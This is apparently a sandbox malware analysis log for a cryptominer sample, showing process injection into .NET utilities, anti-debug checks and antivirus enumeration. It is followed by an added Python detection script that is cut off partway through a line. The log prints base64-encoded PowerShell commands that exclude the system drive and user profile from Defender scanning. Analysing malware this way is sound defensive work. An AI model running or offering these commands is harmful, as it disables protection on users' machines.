                    Source: InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
                    Source: fname.exe.12.drBinary or memory string: noreply@vmware.com0
                    Source: fname.exe.12.drBinary or memory string: http://www.vmware.com/0
                    Source: fname.exe.12.drBinary or memory string: VMware, Inc.1!0
                    Source: fname.exe.12.drBinary or memory string: http://www.vmware.com/0/
                    Source: fname.exe.12.drBinary or memory string: VMware, Inc.1
                    Source: fname.exe.12.drBinary or memory string: VMware, Inc.0
                    Source: InstallUtil.exe, 0000000C.00000002.649001825.0000000000FC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: InstallUtil.exe, 0000000C.00000002.650039113.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFW
                    Source: C:\Users\user\Desktop\CryptoMiner.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00DA5E29 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D79280 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D792A0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00DD4C2A mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00DC9A49 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeCode function: 20_2_00DBDB50 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\CryptoMiner.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D968D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00DA664D __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D968D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00D9C891 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
                    Source: C:\Users\user\Desktop\CryptoMiner.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page read and write
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\CryptoMiner.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\CryptoMiner.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\Desktop\CryptoMiner.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AFB008
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4FAE008
                    Source: 0.3.CryptoMiner.exe.d730000.0.unpack, SystemNetMimeQEncodedStreamReadStateInfok.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                    Source: 0.3.CryptoMiner.exe.d730000.1.unpack, SystemNetMimeQEncodedStreamReadStateInfok.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                    Source: filename.exe.12.dr, u206c???????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
                    Source: 12.0.InstallUtil.exe.400000.0.unpack, SystemNetMimeQEncodedStreamReadStateInfok.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                    Source: 12.2.InstallUtil.exe.400000.0.unpack, SystemNetMimeQEncodedStreamReadStateInfok.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                    Source: 12.0.InstallUtil.exe.400000.1.unpack, SystemNetMimeQEncodedStreamReadStateInfok.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                    Source: 20.3.fname.exe.2f70000.0.unpack, u000fu2005.csReference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
                    Source: 22.2.AppLaunch.exe.400000.0.unpack, u000fu2005.csReference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                    Source: C:\Users\user\Desktop\CryptoMiner.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\AppData\Local\Temp\fname.exe "C:\Users\user\AppData\Local\Temp\fname.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\AppData\Local\Temp\filename.exe "C:\Users\user\AppData\Local\Temp\filename.exe"
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\filename.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\filename.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\filename.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: 0_2_00DA0041 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
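The encoded PowerShell launch above is the one action in this chain a defender can turn into a reliable detection: the `-EncodedCommand` payload is plain UTF-16LE text under base64, and once decoded it is an `Add-MpPreference` call that excludes `$env:SystemDrive` (the whole of C:) and `$env:UserProfile` from Defender scanning. The following script is an added example, not part of the Joe Sandbox report or the sample: it decodes `-EncodedCommand` payloads (accepting the abbreviated `-e`, `-ec`, `-enc` forms PowerShell allows), then grades any Defender exclusion or `-Disable*` switch by how much of the disk it covers. The only real input is the command line recorded in this report; the process-creation records, the field names (`parent`, `image`, `cmdline`) and the scope table are constructed for the example.

```python
"""Decode PowerShell -EncodedCommand payloads and flag Windows Defender
tampering in process-creation records (added example, not report content)."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# The cmd.exe -> powershell.exe command line recorded in this report.
SAMPLE_CMDLINE = (
    'powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0A'
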